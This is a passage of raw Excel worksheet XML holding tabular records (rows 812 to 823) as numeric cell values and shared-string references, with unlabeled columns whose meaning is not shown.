        <v>0</v>
      </c>
      <c r="P812">
        <v>0</v>
      </c>
      <c r="Q812">
        <v>0</v>
      </c>
      <c r="R812">
        <v>3</v>
      </c>
      <c r="S812">
        <v>0</v>
      </c>
      <c r="T812">
        <v>0</v>
      </c>
      <c r="U812">
        <v>100000</v>
      </c>
      <c r="V812">
        <v>9000</v>
      </c>
      <c r="W812">
        <v>5000</v>
      </c>
      <c r="X812">
        <v>0</v>
      </c>
      <c r="Y812">
        <v>0</v>
      </c>
      <c r="Z812">
        <v>0</v>
      </c>
      <c r="AA812">
        <v>0</v>
      </c>
      <c r="AB812">
        <v>0</v>
      </c>
      <c r="AC812">
        <v>9000</v>
      </c>
      <c r="AD812">
        <v>0</v>
      </c>
      <c r="AE812">
        <v>0</v>
      </c>
      <c r="AF812" t="s">
        <v>6312</v>
      </c>
      <c r="AG812">
        <v>83654</v>
      </c>
      <c r="AH812">
        <v>18</v>
      </c>
      <c r="AJ812">
        <v>285</v>
      </c>
      <c r="AK812" t="s">
        <v>4146</v>
      </c>
      <c r="AL812" t="s">
        <v>6313</v>
      </c>
      <c r="AM812" t="s">
        <v>6314</v>
      </c>
      <c r="AN812" t="s">
        <v>68</v>
      </c>
      <c r="AO812">
        <v>2014</v>
      </c>
      <c r="AP812">
        <v>6285239822222</v>
      </c>
      <c r="AQ812" t="s">
        <v>6315</v>
      </c>
      <c r="AR812" t="s">
        <v>6316</v>
      </c>
      <c r="AS812" t="s">
        <v>71</v>
      </c>
      <c r="AT812" t="s">
        <v>58</v>
      </c>
      <c r="AU812">
        <v>24</v>
      </c>
      <c r="AV812">
        <v>1</v>
      </c>
      <c r="AW812">
        <v>15</v>
      </c>
      <c r="AX812">
        <v>0</v>
      </c>
      <c r="AY812">
        <v>14</v>
      </c>
      <c r="AZ812">
        <v>4</v>
      </c>
      <c r="BA812" t="s">
        <v>17107</v>
      </c>
      <c r="BB812" t="s">
        <v>17106</v>
      </c>
      <c r="BC812" t="s">
        <v>9708</v>
      </c>
      <c r="BD812" t="s">
        <v>9709</v>
      </c>
    </row>
    <row r="813" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A813">
        <v>2300</v>
      </c>
      <c r="B813" t="s">
        <v>6317</v>
      </c>
      <c r="C813" t="s">
        <v>458</v>
      </c>
      <c r="D813" t="s">
        <v>6318</v>
      </c>
      <c r="E813" t="s">
        <v>111</v>
      </c>
      <c r="F813" t="s">
        <v>6319</v>
      </c>
      <c r="G813" s="1">
        <v>44152</v>
      </c>
      <c r="H813">
        <v>6625</v>
      </c>
      <c r="I813">
        <v>6625</v>
      </c>
      <c r="J813">
        <v>2</v>
      </c>
      <c r="K813">
        <v>0</v>
      </c>
      <c r="L813">
        <v>1</v>
      </c>
      <c r="M813">
        <v>0</v>
      </c>
      <c r="N813">
        <v>0</v>
      </c>
      <c r="O813">
        <v>0</v>
      </c>
      <c r="P813">
        <v>0</v>
      </c>
      <c r="Q813">
        <v>0</v>
      </c>
      <c r="R813">
        <v>0</v>
      </c>
      <c r="S813">
        <v>0</v>
      </c>
      <c r="T813">
        <v>0</v>
      </c>
      <c r="U813">
        <v>20000</v>
      </c>
      <c r="V813">
        <v>0</v>
      </c>
      <c r="W813">
        <v>2000</v>
      </c>
      <c r="X813">
        <v>0</v>
      </c>
      <c r="Y813">
        <v>0</v>
      </c>
      <c r="Z813">
        <v>0</v>
      </c>
      <c r="AA813">
        <v>0</v>
      </c>
      <c r="AB813">
        <v>0</v>
      </c>
      <c r="AC813">
        <v>0</v>
      </c>
      <c r="AD813">
        <v>0</v>
      </c>
      <c r="AE813">
        <v>0</v>
      </c>
      <c r="AF813" t="s">
        <v>6320</v>
      </c>
      <c r="AG813">
        <v>29153</v>
      </c>
      <c r="AH813">
        <v>5</v>
      </c>
      <c r="AJ813">
        <v>149</v>
      </c>
      <c r="AK813" t="s">
        <v>3646</v>
      </c>
      <c r="AL813" t="s">
        <v>3647</v>
      </c>
      <c r="AM813" t="s">
        <v>6321</v>
      </c>
      <c r="AN813" t="s">
        <v>68</v>
      </c>
      <c r="AO813">
        <v>1995</v>
      </c>
      <c r="AP813" t="s">
        <v>6322</v>
      </c>
      <c r="AQ813" t="s">
        <v>6323</v>
      </c>
      <c r="AR813" t="s">
        <v>6320</v>
      </c>
      <c r="AS813" t="s">
        <v>71</v>
      </c>
      <c r="AT813" t="s">
        <v>72</v>
      </c>
      <c r="AU813">
        <v>26</v>
      </c>
      <c r="AV813">
        <v>1</v>
      </c>
      <c r="AW813">
        <v>5</v>
      </c>
      <c r="AX813">
        <v>0</v>
      </c>
      <c r="AY813">
        <v>22</v>
      </c>
      <c r="AZ813">
        <v>8</v>
      </c>
      <c r="BA813" t="s">
        <v>17122</v>
      </c>
      <c r="BB813" t="s">
        <v>15816</v>
      </c>
      <c r="BC813" t="s">
        <v>12120</v>
      </c>
      <c r="BD813" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="814" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A814">
        <v>2339</v>
      </c>
      <c r="B814" t="s">
        <v>6324</v>
      </c>
      <c r="C814" t="s">
        <v>199</v>
      </c>
      <c r="D814" t="s">
        <v>6325</v>
      </c>
      <c r="E814" t="s">
        <v>49</v>
      </c>
      <c r="F814" t="s">
        <v>3341</v>
      </c>
      <c r="G814" s="1">
        <v>44117</v>
      </c>
      <c r="H814">
        <v>6636</v>
      </c>
      <c r="I814">
        <v>6636</v>
      </c>
      <c r="J814">
        <v>0</v>
      </c>
      <c r="K814">
        <v>0</v>
      </c>
      <c r="L814">
        <v>0</v>
      </c>
      <c r="M814">
        <v>0</v>
      </c>
      <c r="N814">
        <v>0</v>
      </c>
      <c r="O814">
        <v>0</v>
      </c>
      <c r="P814">
        <v>0</v>
      </c>
      <c r="Q814">
        <v>1</v>
      </c>
      <c r="R814">
        <v>1</v>
      </c>
      <c r="S814">
        <v>0</v>
      </c>
      <c r="T814">
        <v>1</v>
      </c>
      <c r="U814">
        <v>0</v>
      </c>
      <c r="V814">
        <v>0</v>
      </c>
      <c r="W814">
        <v>0</v>
      </c>
      <c r="X814">
        <v>0</v>
      </c>
      <c r="Y814">
        <v>0</v>
      </c>
      <c r="Z814">
        <v>0</v>
      </c>
      <c r="AA814">
        <v>0</v>
      </c>
      <c r="AB814">
        <v>50</v>
      </c>
      <c r="AC814">
        <v>100</v>
      </c>
      <c r="AD814">
        <v>0</v>
      </c>
      <c r="AE814">
        <v>1000</v>
      </c>
      <c r="AF814" t="s">
        <v>6326</v>
      </c>
      <c r="AG814">
        <v>23235</v>
      </c>
      <c r="AH814">
        <v>1</v>
      </c>
      <c r="AJ814">
        <v>19</v>
      </c>
      <c r="AK814" t="s">
        <v>203</v>
      </c>
      <c r="AL814" t="s">
        <v>6327</v>
      </c>
      <c r="AM814" t="s">
        <v>6328</v>
      </c>
      <c r="AN814" t="s">
        <v>68</v>
      </c>
      <c r="AO814">
        <v>2014</v>
      </c>
      <c r="AP814">
        <v>81370003293</v>
      </c>
      <c r="AQ814">
        <v>81370003293</v>
      </c>
      <c r="AR814" t="s">
        <v>6329</v>
      </c>
      <c r="AS814" t="s">
        <v>71</v>
      </c>
      <c r="AT814" t="s">
        <v>72</v>
      </c>
      <c r="AU814">
        <v>24</v>
      </c>
      <c r="AV814">
        <v>0</v>
      </c>
      <c r="AW814">
        <v>1</v>
      </c>
      <c r="AX814">
        <v>2</v>
      </c>
      <c r="AY814">
        <v>1</v>
      </c>
      <c r="AZ814">
        <v>3</v>
      </c>
      <c r="BA814" t="s">
        <v>17137</v>
      </c>
      <c r="BB814" t="s">
        <v>15840</v>
      </c>
      <c r="BC814" t="s">
        <v>12178</v>
      </c>
      <c r="BD814">
        <v>0</v>
      </c>
    </row>
    <row r="815" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A815">
        <v>2229</v>
      </c>
      <c r="B815" t="s">
        <v>6330</v>
      </c>
      <c r="C815" t="s">
        <v>157</v>
      </c>
      <c r="D815" t="s">
        <v>6331</v>
      </c>
      <c r="E815" t="s">
        <v>131</v>
      </c>
      <c r="F815" t="s">
        <v>132</v>
      </c>
      <c r="G815" s="1">
        <v>44124</v>
      </c>
      <c r="H815">
        <v>6883</v>
      </c>
      <c r="I815">
        <v>6883</v>
      </c>
      <c r="J815">
        <v>0</v>
      </c>
      <c r="K815">
        <v>0</v>
      </c>
      <c r="L815">
        <v>0</v>
      </c>
      <c r="M815">
        <v>0</v>
      </c>
      <c r="N815">
        <v>0</v>
      </c>
      <c r="O815">
        <v>0</v>
      </c>
      <c r="P815">
        <v>0</v>
      </c>
      <c r="Q815">
        <v>0</v>
      </c>
      <c r="R815">
        <v>0</v>
      </c>
      <c r="S815">
        <v>1</v>
      </c>
      <c r="T815">
        <v>1</v>
      </c>
      <c r="U815">
        <v>0</v>
      </c>
      <c r="V815">
        <v>0</v>
      </c>
      <c r="W815">
        <v>0</v>
      </c>
      <c r="X815">
        <v>0</v>
      </c>
      <c r="Y815">
        <v>0</v>
      </c>
      <c r="Z815">
        <v>0</v>
      </c>
      <c r="AA815">
        <v>0</v>
      </c>
      <c r="AB815">
        <v>0</v>
      </c>
      <c r="AC815">
        <v>0</v>
      </c>
      <c r="AD815">
        <v>1</v>
      </c>
      <c r="AE815">
        <v>600000</v>
      </c>
      <c r="AF815" t="s">
        <v>6332</v>
      </c>
      <c r="AG815">
        <v>67163</v>
      </c>
      <c r="AH815">
        <v>16</v>
      </c>
      <c r="AJ815">
        <v>241</v>
      </c>
      <c r="AK815" t="s">
        <v>6333</v>
      </c>
      <c r="AL815" t="s">
        <v>6334</v>
      </c>
      <c r="AM815" t="s">
        <v>6335</v>
      </c>
      <c r="AN815" t="s">
        <v>55</v>
      </c>
      <c r="AO815">
        <v>2015</v>
      </c>
      <c r="AP815" t="s">
        <v>6336</v>
      </c>
      <c r="AQ815" t="s">
        <v>6337</v>
      </c>
      <c r="AR815" t="s">
        <v>6338</v>
      </c>
      <c r="AS815" t="s">
        <v>71</v>
      </c>
      <c r="AT815" t="s">
        <v>58</v>
      </c>
      <c r="AU815">
        <v>24</v>
      </c>
      <c r="AV815">
        <v>3</v>
      </c>
      <c r="AW815">
        <v>41</v>
      </c>
      <c r="AX815">
        <v>1</v>
      </c>
      <c r="AY815">
        <v>4</v>
      </c>
      <c r="AZ815">
        <v>2</v>
      </c>
      <c r="BA815" t="s">
        <v>17090</v>
      </c>
      <c r="BB815" t="s">
        <v>15775</v>
      </c>
      <c r="BC815" t="s">
        <v>9571</v>
      </c>
      <c r="BD815">
        <v>0</v>
      </c>
    </row>
    <row r="816" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A816">
        <v>2209</v>
      </c>
      <c r="B816" t="s">
        <v>6339</v>
      </c>
      <c r="C816" t="s">
        <v>999</v>
      </c>
      <c r="D816" t="s">
        <v>6340</v>
      </c>
      <c r="E816" t="s">
        <v>49</v>
      </c>
      <c r="F816" t="s">
        <v>6341</v>
      </c>
      <c r="G816" s="1">
        <v>44340</v>
      </c>
      <c r="H816">
        <v>6955</v>
      </c>
      <c r="I816">
        <v>6955</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t="s">
        <v>6342</v>
      </c>
      <c r="AG816">
        <v>91211</v>
      </c>
      <c r="AH816">
        <v>30</v>
      </c>
      <c r="AJ816">
        <v>449</v>
      </c>
      <c r="AK816" t="s">
        <v>6343</v>
      </c>
      <c r="AL816" t="s">
        <v>6344</v>
      </c>
      <c r="AM816" t="s">
        <v>6345</v>
      </c>
      <c r="AN816" t="s">
        <v>68</v>
      </c>
      <c r="AO816">
        <v>2012</v>
      </c>
      <c r="AP816">
        <v>81355569366</v>
      </c>
      <c r="AQ816" t="s">
        <v>6346</v>
      </c>
      <c r="AR816" t="s">
        <v>6342</v>
      </c>
      <c r="AS816" t="s">
        <v>71</v>
      </c>
      <c r="AT816" t="s">
        <v>72</v>
      </c>
      <c r="AU816">
        <v>26</v>
      </c>
      <c r="AV816">
        <v>0</v>
      </c>
      <c r="AW816">
        <v>0</v>
      </c>
      <c r="AX816">
        <v>1</v>
      </c>
      <c r="AY816">
        <v>1</v>
      </c>
      <c r="AZ816">
        <v>6</v>
      </c>
      <c r="BA816" t="s">
        <v>17088</v>
      </c>
      <c r="BB816" t="s">
        <v>16082</v>
      </c>
      <c r="BC816" t="s">
        <v>12322</v>
      </c>
      <c r="BD816">
        <v>0</v>
      </c>
    </row>
    <row r="817" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A817">
        <v>2127</v>
      </c>
      <c r="B817" t="s">
        <v>6347</v>
      </c>
      <c r="C817" t="s">
        <v>157</v>
      </c>
      <c r="D817" t="s">
        <v>6348</v>
      </c>
      <c r="E817" t="s">
        <v>131</v>
      </c>
      <c r="F817" t="s">
        <v>3318</v>
      </c>
      <c r="G817" s="1">
        <v>44210</v>
      </c>
      <c r="H817">
        <v>7289</v>
      </c>
      <c r="I817">
        <v>7289</v>
      </c>
      <c r="J817">
        <v>0</v>
      </c>
      <c r="K817">
        <v>0</v>
      </c>
      <c r="L817">
        <v>0</v>
      </c>
      <c r="M817">
        <v>0</v>
      </c>
      <c r="N817">
        <v>0</v>
      </c>
      <c r="O817">
        <v>0</v>
      </c>
      <c r="P817">
        <v>0</v>
      </c>
      <c r="Q817">
        <v>2</v>
      </c>
      <c r="R817">
        <v>0</v>
      </c>
      <c r="S817">
        <v>0</v>
      </c>
      <c r="T817">
        <v>3</v>
      </c>
      <c r="U817">
        <v>0</v>
      </c>
      <c r="V817">
        <v>0</v>
      </c>
      <c r="W817">
        <v>0</v>
      </c>
      <c r="X817">
        <v>0</v>
      </c>
      <c r="Y817">
        <v>0</v>
      </c>
      <c r="Z817">
        <v>0</v>
      </c>
      <c r="AA817">
        <v>0</v>
      </c>
      <c r="AB817">
        <v>600</v>
      </c>
      <c r="AC817">
        <v>0</v>
      </c>
      <c r="AD817">
        <v>0</v>
      </c>
      <c r="AE817">
        <v>2750000</v>
      </c>
      <c r="AF817" t="s">
        <v>6349</v>
      </c>
      <c r="AG817">
        <v>67155</v>
      </c>
      <c r="AH817">
        <v>16</v>
      </c>
      <c r="AJ817">
        <v>241</v>
      </c>
      <c r="AK817" t="s">
        <v>1231</v>
      </c>
      <c r="AL817" t="s">
        <v>3320</v>
      </c>
      <c r="AM817" t="s">
        <v>6350</v>
      </c>
      <c r="AN817" t="s">
        <v>55</v>
      </c>
      <c r="AO817">
        <v>1998</v>
      </c>
      <c r="AP817" t="s">
        <v>6351</v>
      </c>
      <c r="AQ817" t="s">
        <v>6352</v>
      </c>
      <c r="AR817" t="s">
        <v>6353</v>
      </c>
      <c r="AS817" t="s">
        <v>371</v>
      </c>
      <c r="AT817" t="s">
        <v>72</v>
      </c>
      <c r="AU817">
        <v>30</v>
      </c>
      <c r="AV817">
        <v>3</v>
      </c>
      <c r="AW817">
        <v>65</v>
      </c>
      <c r="AX817">
        <v>0</v>
      </c>
      <c r="AY817">
        <v>51</v>
      </c>
      <c r="AZ817">
        <v>15</v>
      </c>
      <c r="BA817" t="s">
        <v>17074</v>
      </c>
      <c r="BB817" t="s">
        <v>15717</v>
      </c>
      <c r="BC817">
        <v>0</v>
      </c>
      <c r="BD817" t="s">
        <v>9752</v>
      </c>
    </row>
    <row r="818" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A818">
        <v>2106</v>
      </c>
      <c r="B818" t="s">
        <v>6354</v>
      </c>
      <c r="C818" t="s">
        <v>477</v>
      </c>
      <c r="D818" t="s">
        <v>6355</v>
      </c>
      <c r="E818" t="s">
        <v>142</v>
      </c>
      <c r="F818" t="s">
        <v>666</v>
      </c>
      <c r="G818" s="1">
        <v>44181</v>
      </c>
      <c r="H818">
        <v>7590</v>
      </c>
      <c r="I818">
        <v>7590</v>
      </c>
      <c r="J818">
        <v>1</v>
      </c>
      <c r="K818">
        <v>1</v>
      </c>
      <c r="L818">
        <v>3</v>
      </c>
      <c r="M818">
        <v>0</v>
      </c>
      <c r="N818">
        <v>0</v>
      </c>
      <c r="O818">
        <v>0</v>
      </c>
      <c r="P818">
        <v>0</v>
      </c>
      <c r="Q818">
        <v>1</v>
      </c>
      <c r="R818">
        <v>6</v>
      </c>
      <c r="S818">
        <v>0</v>
      </c>
      <c r="T818">
        <v>0</v>
      </c>
      <c r="U818">
        <v>5</v>
      </c>
      <c r="V818">
        <v>200</v>
      </c>
      <c r="W818">
        <v>5000</v>
      </c>
      <c r="X818">
        <v>0</v>
      </c>
      <c r="Y818">
        <v>0</v>
      </c>
      <c r="Z818">
        <v>0</v>
      </c>
      <c r="AA818">
        <v>0</v>
      </c>
      <c r="AB818">
        <v>50</v>
      </c>
      <c r="AC818">
        <v>6</v>
      </c>
      <c r="AD818">
        <v>0</v>
      </c>
      <c r="AE818">
        <v>0</v>
      </c>
      <c r="AF818" t="s">
        <v>6356</v>
      </c>
      <c r="AG818">
        <v>95855</v>
      </c>
      <c r="AH818">
        <v>29</v>
      </c>
      <c r="AJ818">
        <v>373</v>
      </c>
      <c r="AK818" t="s">
        <v>6357</v>
      </c>
      <c r="AL818" t="s">
        <v>6358</v>
      </c>
      <c r="AM818" t="s">
        <v>6359</v>
      </c>
      <c r="AN818" t="s">
        <v>55</v>
      </c>
      <c r="AO818">
        <v>2017</v>
      </c>
      <c r="AP818">
        <v>82259678589</v>
      </c>
      <c r="AQ818" t="s">
        <v>6360</v>
      </c>
      <c r="AR818" t="s">
        <v>6361</v>
      </c>
      <c r="AS818" t="s">
        <v>71</v>
      </c>
      <c r="AT818" t="s">
        <v>58</v>
      </c>
      <c r="AU818">
        <v>24</v>
      </c>
      <c r="AV818">
        <v>0</v>
      </c>
      <c r="AW818">
        <v>16</v>
      </c>
      <c r="AX818">
        <v>15</v>
      </c>
      <c r="AY818">
        <v>2</v>
      </c>
      <c r="AZ818">
        <v>1</v>
      </c>
      <c r="BA818" t="s">
        <v>17066</v>
      </c>
      <c r="BB818" t="s">
        <v>15703</v>
      </c>
      <c r="BC818">
        <v>0</v>
      </c>
      <c r="BD818">
        <v>0</v>
      </c>
    </row>
    <row r="819" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A819">
        <v>2086</v>
      </c>
      <c r="B819" t="s">
        <v>6362</v>
      </c>
      <c r="C819" t="s">
        <v>5506</v>
      </c>
      <c r="D819" t="s">
        <v>6363</v>
      </c>
      <c r="E819" t="s">
        <v>843</v>
      </c>
      <c r="F819" t="s">
        <v>6364</v>
      </c>
      <c r="G819" s="1">
        <v>44232</v>
      </c>
      <c r="H819">
        <v>7793</v>
      </c>
      <c r="I819">
        <v>7793</v>
      </c>
      <c r="J819">
        <v>1</v>
      </c>
      <c r="K819">
        <v>0</v>
      </c>
      <c r="L819">
        <v>3</v>
      </c>
      <c r="M819">
        <v>0</v>
      </c>
      <c r="N819">
        <v>0</v>
      </c>
      <c r="O819">
        <v>0</v>
      </c>
      <c r="P819">
        <v>0</v>
      </c>
      <c r="Q819">
        <v>0</v>
      </c>
      <c r="R819">
        <v>1</v>
      </c>
      <c r="S819">
        <v>0</v>
      </c>
      <c r="T819">
        <v>0</v>
      </c>
      <c r="U819">
        <v>100000</v>
      </c>
      <c r="V819">
        <v>0</v>
      </c>
      <c r="W819">
        <v>15000</v>
      </c>
      <c r="X819">
        <v>0</v>
      </c>
      <c r="Y819">
        <v>0</v>
      </c>
      <c r="Z819">
        <v>0</v>
      </c>
      <c r="AA819">
        <v>0</v>
      </c>
      <c r="AB819">
        <v>0</v>
      </c>
      <c r="AC819">
        <v>1000</v>
      </c>
      <c r="AD819">
        <v>0</v>
      </c>
      <c r="AE819">
        <v>0</v>
      </c>
      <c r="AF819" t="s">
        <v>6365</v>
      </c>
      <c r="AG819">
        <v>86215</v>
      </c>
      <c r="AH819">
        <v>19</v>
      </c>
      <c r="AJ819">
        <v>302</v>
      </c>
      <c r="AK819" t="s">
        <v>6366</v>
      </c>
      <c r="AL819" t="s">
        <v>2385</v>
      </c>
      <c r="AM819" t="s">
        <v>6367</v>
      </c>
      <c r="AN819" t="s">
        <v>55</v>
      </c>
      <c r="AO819">
        <v>2019</v>
      </c>
      <c r="AP819">
        <v>811578309</v>
      </c>
      <c r="AQ819" t="s">
        <v>6368</v>
      </c>
      <c r="AR819" t="s">
        <v>6369</v>
      </c>
      <c r="AS819" t="s">
        <v>71</v>
      </c>
      <c r="AT819" t="s">
        <v>58</v>
      </c>
      <c r="AU819">
        <v>24</v>
      </c>
      <c r="AV819">
        <v>0</v>
      </c>
      <c r="AW819">
        <v>0</v>
      </c>
      <c r="AX819">
        <v>0</v>
      </c>
      <c r="AY819">
        <v>47</v>
      </c>
      <c r="AZ819">
        <v>2</v>
      </c>
      <c r="BA819" t="s">
        <v>17061</v>
      </c>
      <c r="BB819" t="s">
        <v>15691</v>
      </c>
      <c r="BC819" t="s">
        <v>12685</v>
      </c>
      <c r="BD819" t="s">
        <v>12686</v>
      </c>
    </row>
    <row r="820" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A820">
        <v>2217</v>
      </c>
      <c r="B820" t="s">
        <v>6370</v>
      </c>
      <c r="C820" t="s">
        <v>458</v>
      </c>
      <c r="D820" t="s">
        <v>6371</v>
      </c>
      <c r="E820" t="s">
        <v>300</v>
      </c>
      <c r="F820" t="s">
        <v>6372</v>
      </c>
      <c r="G820" s="1">
        <v>44252</v>
      </c>
      <c r="H820">
        <v>7856</v>
      </c>
      <c r="I820">
        <v>7856</v>
      </c>
      <c r="J820">
        <v>0</v>
      </c>
      <c r="K820">
        <v>2</v>
      </c>
      <c r="L820">
        <v>1</v>
      </c>
      <c r="M820">
        <v>0</v>
      </c>
      <c r="N820">
        <v>0</v>
      </c>
      <c r="O820">
        <v>0</v>
      </c>
      <c r="P820">
        <v>0</v>
      </c>
      <c r="Q820">
        <v>0</v>
      </c>
      <c r="R820">
        <v>0</v>
      </c>
      <c r="S820">
        <v>0</v>
      </c>
      <c r="T820">
        <v>0</v>
      </c>
      <c r="U820">
        <v>0</v>
      </c>
      <c r="V820">
        <v>180</v>
      </c>
      <c r="W820">
        <v>144</v>
      </c>
      <c r="X820">
        <v>0</v>
      </c>
      <c r="Y820">
        <v>0</v>
      </c>
      <c r="Z820">
        <v>0</v>
      </c>
      <c r="AA820">
        <v>0</v>
      </c>
      <c r="AB820">
        <v>0</v>
      </c>
      <c r="AC820">
        <v>0</v>
      </c>
      <c r="AD820">
        <v>0</v>
      </c>
      <c r="AE820">
        <v>0</v>
      </c>
      <c r="AF820" t="s">
        <v>6370</v>
      </c>
      <c r="AG820">
        <v>29664</v>
      </c>
      <c r="AH820">
        <v>5</v>
      </c>
      <c r="AJ820">
        <v>148</v>
      </c>
      <c r="AK820" t="s">
        <v>4492</v>
      </c>
      <c r="AL820" t="s">
        <v>4493</v>
      </c>
      <c r="AM820" t="s">
        <v>6373</v>
      </c>
      <c r="AN820" t="s">
        <v>55</v>
      </c>
      <c r="AO820">
        <v>2015</v>
      </c>
      <c r="AP820" t="s">
        <v>6374</v>
      </c>
      <c r="AQ820" t="s">
        <v>6375</v>
      </c>
      <c r="AR820" t="s">
        <v>6370</v>
      </c>
      <c r="AS820" t="s">
        <v>71</v>
      </c>
      <c r="AT820" t="s">
        <v>58</v>
      </c>
      <c r="AU820">
        <v>26</v>
      </c>
      <c r="AV820">
        <v>1</v>
      </c>
      <c r="AW820">
        <v>0</v>
      </c>
      <c r="AX820">
        <v>0</v>
      </c>
      <c r="AY820">
        <v>7</v>
      </c>
      <c r="AZ820">
        <v>1</v>
      </c>
      <c r="BA820" t="s">
        <v>17089</v>
      </c>
      <c r="BB820" t="s">
        <v>15770</v>
      </c>
      <c r="BC820">
        <v>0</v>
      </c>
      <c r="BD820" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="821" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A821">
        <v>2580</v>
      </c>
      <c r="B821" t="s">
        <v>6376</v>
      </c>
      <c r="C821" t="s">
        <v>458</v>
      </c>
      <c r="D821" t="s">
        <v>6377</v>
      </c>
      <c r="E821" t="s">
        <v>142</v>
      </c>
      <c r="F821" t="s">
        <v>3299</v>
      </c>
      <c r="G821" s="1">
        <v>44207</v>
      </c>
      <c r="H821">
        <v>7951</v>
      </c>
      <c r="I821">
        <v>7951</v>
      </c>
      <c r="J821">
        <v>2</v>
      </c>
      <c r="K821">
        <v>8</v>
      </c>
      <c r="L821">
        <v>0</v>
      </c>
      <c r="M821">
        <v>6</v>
      </c>
      <c r="N821">
        <v>0</v>
      </c>
      <c r="O821">
        <v>0</v>
      </c>
      <c r="P821">
        <v>0</v>
      </c>
      <c r="Q821">
        <v>0</v>
      </c>
      <c r="R821">
        <v>0</v>
      </c>
      <c r="S821">
        <v>0</v>
      </c>
      <c r="T821">
        <v>0</v>
      </c>
      <c r="U821">
        <v>150000</v>
      </c>
      <c r="V821">
        <v>16000</v>
      </c>
      <c r="W821">
        <v>0</v>
      </c>
      <c r="X821">
        <v>14000</v>
      </c>
      <c r="Y821">
        <v>0</v>
      </c>
      <c r="Z821">
        <v>0</v>
      </c>
      <c r="AA821">
        <v>0</v>
      </c>
      <c r="AB821">
        <v>0</v>
      </c>
      <c r="AC821">
        <v>0</v>
      </c>
      <c r="AD821">
        <v>0</v>
      </c>
      <c r="AE821">
        <v>0</v>
      </c>
      <c r="AF821" t="s">
        <v>6378</v>
      </c>
      <c r="AG821">
        <v>29783</v>
      </c>
      <c r="AH821">
        <v>5</v>
      </c>
      <c r="AJ821">
        <v>150</v>
      </c>
      <c r="AK821" t="s">
        <v>3800</v>
      </c>
      <c r="AL821" t="s">
        <v>6379</v>
      </c>
      <c r="AM821" t="s">
        <v>6380</v>
      </c>
      <c r="AN821" t="s">
        <v>55</v>
      </c>
      <c r="AO821">
        <v>2011</v>
      </c>
      <c r="AP821" t="s">
        <v>623</v>
      </c>
      <c r="AQ821" t="s">
        <v>6381</v>
      </c>
      <c r="AR821" t="s">
        <v>6378</v>
      </c>
      <c r="AS821" t="s">
        <v>71</v>
      </c>
      <c r="AT821" t="s">
        <v>58</v>
      </c>
      <c r="AU821">
        <v>26</v>
      </c>
      <c r="AV821">
        <v>1</v>
      </c>
      <c r="AW821">
        <v>10</v>
      </c>
      <c r="AX821">
        <v>5</v>
      </c>
      <c r="AY821">
        <v>9</v>
      </c>
      <c r="AZ821">
        <v>4</v>
      </c>
      <c r="BA821" t="s">
        <v>17189</v>
      </c>
      <c r="BB821" t="s">
        <v>16105</v>
      </c>
      <c r="BC821" t="s">
        <v>9550</v>
      </c>
      <c r="BD821">
        <v>0</v>
      </c>
    </row>
    <row r="822" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A822">
        <v>1805</v>
      </c>
      <c r="B822" t="s">
        <v>6382</v>
      </c>
      <c r="C822" t="s">
        <v>318</v>
      </c>
      <c r="D822" t="s">
        <v>6383</v>
      </c>
      <c r="E822" t="s">
        <v>363</v>
      </c>
      <c r="F822" t="s">
        <v>364</v>
      </c>
      <c r="G822" s="1">
        <v>44229</v>
      </c>
      <c r="H822">
        <v>8032</v>
      </c>
      <c r="I822">
        <v>8032</v>
      </c>
      <c r="J822">
        <v>0</v>
      </c>
      <c r="K822">
        <v>0</v>
      </c>
      <c r="L822">
        <v>0</v>
      </c>
      <c r="M822">
        <v>0</v>
      </c>
      <c r="N822">
        <v>0</v>
      </c>
      <c r="O822">
        <v>0</v>
      </c>
      <c r="P822">
        <v>0</v>
      </c>
      <c r="Q822">
        <v>0</v>
      </c>
      <c r="R822">
        <v>0</v>
      </c>
      <c r="S822">
        <v>0</v>
      </c>
      <c r="T822">
        <v>1</v>
      </c>
      <c r="U822">
        <v>0</v>
      </c>
      <c r="V822">
        <v>0</v>
      </c>
      <c r="W822">
        <v>0</v>
      </c>
      <c r="X822">
        <v>0</v>
      </c>
      <c r="Y822">
        <v>0</v>
      </c>
      <c r="Z822">
        <v>0</v>
      </c>
      <c r="AA822">
        <v>0</v>
      </c>
      <c r="AB822">
        <v>0</v>
      </c>
      <c r="AC822">
        <v>0</v>
      </c>
      <c r="AD822">
        <v>0</v>
      </c>
      <c r="AE822">
        <v>40000</v>
      </c>
      <c r="AF822" t="s">
        <v>6384</v>
      </c>
      <c r="AG822">
        <v>92153</v>
      </c>
      <c r="AH822">
        <v>26</v>
      </c>
      <c r="AJ822">
        <v>404</v>
      </c>
      <c r="AK822" t="s">
        <v>6385</v>
      </c>
      <c r="AL822" t="s">
        <v>6386</v>
      </c>
      <c r="AM822" t="s">
        <v>6387</v>
      </c>
      <c r="AN822" t="s">
        <v>55</v>
      </c>
      <c r="AO822">
        <v>2012</v>
      </c>
      <c r="AP822" t="s">
        <v>6388</v>
      </c>
      <c r="AQ822" t="s">
        <v>6389</v>
      </c>
      <c r="AR822" t="s">
        <v>6384</v>
      </c>
      <c r="AS822" t="s">
        <v>371</v>
      </c>
      <c r="AT822" t="s">
        <v>58</v>
      </c>
      <c r="AU822">
        <v>26</v>
      </c>
      <c r="AV822">
        <v>0</v>
      </c>
      <c r="AW822">
        <v>7</v>
      </c>
      <c r="AX822">
        <v>0</v>
      </c>
      <c r="AY822">
        <v>1</v>
      </c>
      <c r="AZ822">
        <v>3</v>
      </c>
      <c r="BA822" t="s">
        <v>17001</v>
      </c>
      <c r="BB822" t="s">
        <v>15524</v>
      </c>
      <c r="BC822">
        <v>0</v>
      </c>
      <c r="BD822" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="823" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A823">
        <v>1969</v>
      </c>
      <c r="B823" t="s">
        <v>6390</v>
      </c>
      <c r="C823" t="s">
        <v>318</v>
      </c>
      <c r="D823" t="s">
        <v>6391</v>
      </c>
      <c r="E823" t="s">
        <v>300</v>
      </c>
      <c r="F823" t="s">
